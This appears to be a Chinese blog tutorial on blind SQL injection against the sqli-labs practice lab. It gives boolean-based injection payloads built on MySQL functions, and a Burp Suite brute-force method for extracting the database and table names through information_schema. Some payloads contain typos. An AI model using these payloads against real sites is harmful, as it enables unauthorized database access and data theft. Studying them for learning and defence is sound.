SQL注入之盲注

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量1.7k 收藏 2
点赞数
文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45501227/article/details/127865140
版权

一、什么是盲注

盲注就是在sql注入当中,在执行sql语句的时候由于网站代码的限制,或者是解析器的配置导致网页前端不能回显数据。如果存在先错注入,我们可以构造select语句,将需要的信息在合适的位置显示出来,在进行下一步的测试。

我们使用sqli——labs里的第一关做有回显的。

 来看第五关:我们在源码里面加上一个代码,让他可以显示出我们传递参数的地方构造的sql语句。

 盲注意味着web页面不会显示错误sql语句执行的结果,我们需要判断sql语句是否正确执行。

盲注的分类可以分为两种,一种是布尔类型的盲注,另一种就是延时注入。

布尔类型的盲注:根据页面显示是否正确,来判断我们提交的语句是否正确执行

延时注入:是根据页面加载时间来进行判断。

盲注的优缺点:

        优点:不需要显示位和出错信息

        缺点:速度慢,耗时长,不过可以使用bp工具来进行fuzz

布尔类型盲注的操作步骤:

1、构造目标查询语句

2、选择拼接方式

3、构造判断表达式

4、提取数据长度

5、提取数据内容

二、Mysql数据库相关函数

length(str):返回str字符串的长度
select length(database()) //该语句就可以返回数据库的长度
payload= id=1'and length(database())=8--+ //判断数据库长度是否位8 如果是8则返回正常页面反之错误页面。



substr(str):截取字符串函数
select substr('email',4,2) =  "il"  //有三个参数,str pos len  ,第一个参数就是我们的sql语句,第二个参数表示从第几个字符开始,第三个参数就是取几位。从pos位置取str位置的len值.如果pos位负数,则为倒数第几个,-4 就为倒数第四个 结果结尾 ma 
payload=id=1' and substr((select database())1,1)='a'--+ //判断当前数据库第一位字符是否等于'a'如果等于返回正常界面,反之错误界面。




正则表达式:regexp
正则表达式语法:regexp ^[a-z]表示字符串中第一个字符实在a-z范围。^a 表示第一个字符为a。regexp ^ab 表示前俩字符为ab。
payload: id=1'and (select databse()) regexp '^a' --+ //判断数据库第一个字符是否为a。



like函数:
语法:like 'a%' 表示第一个字符为a。'ab%'表示前俩字符为ab
注意:'%'在url中输入的时候需要编码,为'25%'.
payload: id=1' and (select database()) like 'a25%'--+




if条件判断语句:正确返回的值,错误返回的值。
if (exp1,exp2,exp3):当exp1的判断结果为true时返回exp2,否则返回exp3.
payload= id =1' if(((select databse())like '%p'),1,0)--+ //使用if和like函数,如果数据库第一个字符为p,则返回1否则为0.



left:
payload:id=1' and left(databse(),1)='s'--+ //数据库第一位是否为s,如果是返回正确页面否则返回错误界面。

三、利用burp suite工具来进行盲注

手工测试太麻烦了我们可以结合burpsuite进行爆破。

确定参数,这里为了省时间,我就没有加特殊符号用的26个英文字母跑的。

payload:id=1' and substr(database(),1,1)='a'--+

注意现在url里输入在抓包,因为bp里面是url编码后的。

 

 这样就知道了当前数据库第一个字符。

我们可以在加一个变量,是substr的第二个参数改变,已知数据库长度为8,使用集数炸弹即可爆出所有字段。

这里节省时间就直接26字母了没有加特殊符号。而且mysql数据库大小写不敏感。

第一个payload就是1-8数字

就相当于第一位从26位字母里爆然后继续第二位以此类推,最后排序找到完整数据库名

 

 

 

 第三位就是c这里图太多就不放上来了,得到数据库名,security。

得到库名我们可以继续爆表明,payload的思路也是同理,表名无非就是26字母加特殊符号,先爆出来表的长度,再根据长度进行表名的爆破。因为一个库里面不一定有几个表呢。

payload:id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1--+

把参数1爆破,先来1-100.最后跑出来位29

 

 知道了所有表的长度就可以来爆破表名了,和爆破数据库名同理,改变substr第二个参数为1-29.

payload:

id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='a'--+

 

 如上图可以看到第一个字符为e正确,换行也占用一个字符,将他们排序即可获取到表名。

继续爆字段的话也是同理,实战的时候别忘了加上特殊符号。

我像一条狗
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL注入(盲注)
a12332251的博客
12-07 929
SQL
sql注入盲注
2302_79119987的博客
04-23 1780
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
sql注入盲注
最新发布
weixin_64815500的博客
06-19 984
sql注入关于无回显用到的盲注sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
SQL盲注
weixin_59872639的博客
02-18 2446
盲注SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔的盲注(Boolean based) 基于时间的盲注(Time based) 基于布尔的盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
sql注入盲注
inslight的博客
09-23 280
布尔型盲注 1.布尔型盲注(以SQLi-LABS Page-1(Basic Challenges) less8 为例子) 判断 布尔型盲注详情 时间盲注
SQL注入手动盲注案例
05-30
### SQL注入手动盲注案例详解 #### 一、SQL注入概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序的输入字段中插入恶意SQL语句来操纵或窃取数据库中的信息。手动盲注是一种高级技巧,适用于...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入讲解ppt.pptx
08-10
4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果...
sql注入-盲注
weixin_36591264的博客
12-06 3088
学习内容: 布尔盲注 时间盲注 报错盲注 SQL注入-盲注学习内容:前言一、基于布尔盲注二、基于时间盲注三、基于报错盲注 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 •基于布尔 SQL 盲注 •基于时间的 SQL 盲注 •基于报错的 SQL 盲注 注:使用靶场:sqli-labs 靶场下载地址:https
sql盲注
weixin_55710577的博客
04-09 7376
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 sql注入--盲注前言一、什么是盲注二、步骤示例1.测试注入点2.测所在数据库长度3. 利用ASCII码猜当前数据库名4.利用ASCII码查询表名5、利用ASCII码查询字段名sql手注所用到的函数总结sqlmap进行sql盲注 前言 靶场环境:sqli-labs-master 第8关 注入攻击的本质:把用户的输入当作代码执行。 其中存在两个关键条件: (1)用户可以控制输入。 (2)用户的输入被拼接到原代码上被执行。 提示:以下是本篇.
SQL注入——盲注
weixin_74991270的博客
10-10 234
掌握盲注基本的操作多多练习,手工注入+sqlmap跑。
SQL 注入-盲注
Cwillchris的博客
06-04 318
超详细盲注原理讲解
Sql盲注
qq_40077103的博客
09-17 1674
盲注就是sql语句注入后并且成功执行,但是执行的结果不能返回前端,所以需要通过一些其他信息间接推断数据。 盲注分为三类 一、基于布尔的盲注 基于布尔的盲注使用逻辑判断推测获取的数据,通过给定条件,服务器返回真或假使用二分法或者正则表达式等方法缩小判断的范围。 通常会使用sql中的截取字符串函数,以下是一些常见的函数 mid(column_name,start[,length])  #co...
SQL盲注(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
盲注原理 盲注的分类 盲注常用函数 盲注的利用方法 一、SQL盲注概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 2.盲注是不能通过直接显示的途径来获取数据库数据的方法。 盲注可以分为三类: 布尔盲注 时间盲注 报错型盲注 1、布尔盲注 盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
SQL注入---盲注
zhoutong2323的博客
04-05 689
注是一种SQL注入攻击的形式,在这种攻击中,攻击者向目标应用程序发送恶意注入代码,然后通过观察应用程序的响应来推断出数据库中的信息。与常规的SQL注入攻击不同的是,盲注攻击是页面不会将报错信息回显以及没有明显回显位的情况下,页面不直接返回任何有关数据库的具体错误信息,导致攻击者无法直接获得数据库中的数据。盲注可以分为基于布尔逻辑的盲注和基于时间的盲注两种形式。基于布尔逻辑的盲注:攻击者通过在恶意注入代码中利用布尔逻辑运算符(如AND、OR)来判断条件是否为真,从而推断出数据库中的信息。例如,攻击者可以通过尝
sql注入union盲注
07-28
- *1* [SQL注入盲注简单总结](https://blog.csdn.net/qq_42477007/article/details/96492174)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我像一条狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值